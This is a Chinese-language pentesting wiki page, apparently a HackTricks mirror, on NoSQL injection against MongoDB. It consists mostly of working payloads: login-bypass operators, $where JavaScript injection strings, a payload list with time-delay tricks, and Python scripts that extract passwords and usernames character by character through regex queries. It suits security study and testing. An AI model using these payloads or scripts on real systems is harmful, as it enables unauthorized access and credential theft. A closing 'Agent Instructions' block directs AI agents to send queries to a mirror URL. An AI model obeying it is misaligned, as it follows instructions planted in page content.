# NoSQL injection

\ 使用[**Trickest**](https://trickest.com/?utm_campaign=hacktrics\&utm_medium=banner\&utm_source=hacktricks)可以轻松构建和**自动化工作流程**，使用世界上**最先进**的社区工具。\ 立即获取访问权限： {% embed url="" %}

从零开始学习AWS黑客技术，成为专家 htARTE（HackTricks AWS Red Team Expert）！

支持HackTricks的其他方式： * 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**，请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! * 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) * 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family)，我们的独家[NFT](https://opensea.io/collection/the-peass-family)收藏品 * **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。** * 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。

## 利用在PHP中，您可以通过将发送的参数从\_parameter=foo\_更改为\_parameter\[arrName]=foo\_来发送一个数组。这些利用是基于添加一个**运算符**： ```bash username[$ne]=1$password[$ne]=1 # username[$regex]=^adm$password[$ne]=1 #Check a , could be used to brute-force a parameter username[$regex]=.{25}&pass[$ne]=1 #Use the to find the length of a value username[$eq]=admin&password[$ne]=1 # username[$ne]=admin&pass[$lt]=s #, Brute-force pass[$lt] to find more users username[$ne]=admin&pass[$gt]=s # username[$nin][admin]=admin&username[$nin][test]=test&pass[$ne]=7 # (not test and not admin) { $where: "this.credits == this.debits" }#, can be used to execute code ``` ### 基本身份验证绕过 **使用不等于 ($ne) 或大于 ($gt)** ```bash #in URL username[$ne]=toto&password[$ne]=toto username[$regex]=.*&password[$regex]=.* username[$exists]=true&password[$exists]=true #in JSON {"username": {"$ne": null}, "password": {"$ne": null} } {"username": {"$ne": "foo"}, "password": {"$ne": "bar"} } {"username": {"$gt": undefined}, "password": {"$gt": undefined} } ``` ### **SQL - Mongo** 在MongoDB中，NoSQL注入是一种常见的攻击类型。攻击者可以利用不正确的输入验证或过滤来执行恶意操作。要防止NoSQL注入，应该使用参数化查询和安全的编程实践。 ```javascript query = { $where: `this.username == '${username}'` } ``` 攻击者可以利用这一点，输入类似于 `admin' || 'a'=='a` 的字符串，使查询通过引入重言（`'a'=='a'`）来返回满足条件的所有文档。这类似于SQL注入攻击，其中使用类似于 `' or 1=1-- -` 的输入来操纵SQL查询。在MongoDB中，可以使用类似于 `' || 1==1//`、`' || 1==1%00` 或 `admin' || 'a'=='a` 的输入来执行类似的注入。 ``` Normal sql: ' or 1=1-- - Mongo sql: ' || 1==1// or ' || 1==1%00 or admin' || 'a'=='a ``` ### 提取**长度**信息 ```bash username[$ne]=toto&password[$regex]=.{1} username[$ne]=toto&password[$regex]=.{3} # True if the length equals 1,3... ``` ### 提取**数据**信息 ``` in URL (if length == 3) username[$ne]=toto&password[$regex]=a.{2} username[$ne]=toto&password[$regex]=b.{2} ... username[$ne]=toto&password[$regex]=m.{2} username[$ne]=toto&password[$regex]=md.{1} username[$ne]=toto&password[$regex]=mdp username[$ne]=toto&password[$regex]=m.* username[$ne]=toto&password[$regex]=md.* in JSON {"username": {"$eq": "admin"}, "password": {"$regex": "^m" }} {"username": {"$eq": "admin"}, "password": {"$regex": "^md" }} {"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }} ``` ### **SQL - Mongo** ### **SQL - Mongo** ``` /?search=admin' && this.password%00 --> Check if the field password exists /?search=admin' && this.password && this.password.match(/.*/)%00 --> start matching password /?search=admin' && this.password && this.password.match(/^a.*$/)%00 /?search=admin' && this.password && this.password.match(/^b.*$/)%00 /?search=admin' && this.password && this.password.match(/^c.*$/)%00 ... /?search=admin' && this.password && this.password.match(/^duvj.*$/)%00 ... /?search=admin' && this.password && this.password.match(/^duvj78i3u$/)%00 Found ``` ### PHP任意函数执行使用[MongoLite](https://github.com/agentejo/cockpit/tree/0.11.1/lib/MongoLite)库的\*\*$func\*\*运算符（默认使用）可能会导致像[这份报告](https://swarm.ptsecurity.com/rce-cockpit-cms/)中描述的任意函数执行。 ```python "user":{"$func": "var_dump"} ``` ![https://swarm.ptsecurity.com/wp-content/uploads/2021/04/cockpit\_auth\_check\_10.png](/files/7bLRuh2RqAtHzEHAd6mt) ### 从不同集合获取信息可以使用[$lookup](https://www.mongodb.com/docs/manual/reference/operator/aggregation/lookup/)从不同的集合中获取信息。在下面的示例中，我们从一个名为`users`的**不同集合**中读取数据，并获取所有密码与通配符匹配的**条目的结果**。 **注意:** 只有在使用`aggregate()`函数执行搜索时，才能使用`$lookup`和其他聚合函数，而不能使用更常见的`find()`或`findOne()`函数。 ```json [ { "$lookup":{ "from": "users", "as":"resultado","pipeline": [ { "$match":{ "password":{ "$regex":"^.*" } } } ] } } ] ```

\ 使用[**Trickest**](https://trickest.com/?utm_campaign=hacktrics\&utm_medium=banner\&utm_source=hacktricks)轻松构建和**自动化**由全球**最先进**的社区工具驱动的工作流。\ 立即获取访问权限： {% embed url="" %} ## MongoDB 负载列表[从这里](https://github.com/cr0hn/nosqlinjection_wordlists/blob/master/mongodb_nosqli.txt) ``` true, $where: '1 == 1' , $where: '1 == 1' $where: '1 == 1' ', $where: '1 == 1 1, $where: '1 == 1' { $ne: 1 } ', $or: [ {}, { 'a':'a ' } ], $comment:'successful MongoDB injection' db.injection.insert({success:1}); db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1 || 1==1 || 1==1// || 1==1%00 }, { password : /.*/ } ' && this.password.match(/.*/)//+%00 ' && this.passwordzz.match(/.*/)//+%00 '%20%26%26%20this.password.match(/.*/)//+%00 '%20%26%26%20this.passwordzz.match(/.*/)//+%00 {$gt: ''} [$ne]=1 ';sleep(5000); ';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000); {"username": {"$ne": null}, "password": {"$ne": null}} {"username": {"$ne": "foo"}, "password": {"$ne": "bar"}} {"username": {"$gt": undefined}, "password": {"$gt": undefined}} {"username": {"$gt":""}, "password": {"$gt":""}} {"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}} ``` ## 盲注 NoSQL 脚本 ```python import requests, string alphabet = string.ascii_lowercase + string.ascii_uppercase + string.digits + "_@{}-/()!\"$%=^[]:;" flag = "" for i in range(21): print("[i] Looking for char number "+str(i+1)) for char in alphabet: r = requests.get("http://chall.com?param=^"+flag+char) if ("" in r.text): flag += char print("[+] Flag: "+flag) break ``` ```python import requests import urllib3 import string import urllib urllib3.disable_warnings() username="admin" password="" while True: for c in string.printable: if c not in ['*','+','.','?','|']: payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c) r = requests.post(u, data = {'ids': payload}, verify = False) if 'OK' in r.text: print("Found one more char : %s" % (password+c)) password += c ``` ### 从POST登录中暴力破解用户名和密码这是一个简单的脚本，你可以修改它，但之前的工具也可以执行这个任务。 ```python import requests import string url = "http://example.com" headers = {"Host": "exmaple.com"} cookies = {"PHPSESSID": "s3gcsgtqre05bah2vt6tibq8lsdfk"} possible_chars = list(string.ascii_letters) + list(string.digits) + ["\\"+c for c in string.punctuation+string.whitespace ] def get_password(username): print("Extracting password of "+username) params = {"username":username, "password[$regex]":"", "login": "login"} password = "^" while True: for c in possible_chars: params["password[$regex]"] = password + c + ".*" pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False) if int(pr.status_code) == 302: password += c break if c == possible_chars[-1]: print("Found password "+password[1:].replace("\\", "")+" for username "+username) return password[1:].replace("\\", "") def get_usernames(prefix): usernames = [] params = {"username[$regex]":"", "password[$regex]":".*"} for c in possible_chars: username = "^" + prefix + c params["username[$regex]"] = username + ".*" pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False) if int(pr.status_code) == 302: print(username) for user in get_usernames(prefix + c): usernames.append(user) return usernames for u in get_usernames(""): get_password(u) ``` ## 工具 * * ## 参考资料 * * * *

从零开始学习AWS黑客技术 htARTE (HackTricks AWS Red Team Expert)!

支持HackTricks的其他方式： * 如果您想在HackTricks中看到您的**公司广告**或**下载PDF版本的HackTricks**，请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! * 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) * 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family)，我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品 * **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**上关注**我们。 * 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。

\ 使用[**Trickest**](https://trickest.com/?utm_campaign=hacktrics\&utm_medium=banner\&utm_source=hacktricks)轻松构建和**自动化工作流程**，由全球**最先进**的社区工具驱动。\ 立即获取访问权限： {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://hacktricks.xsx.tw/pentesting-web/nosql-injection.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.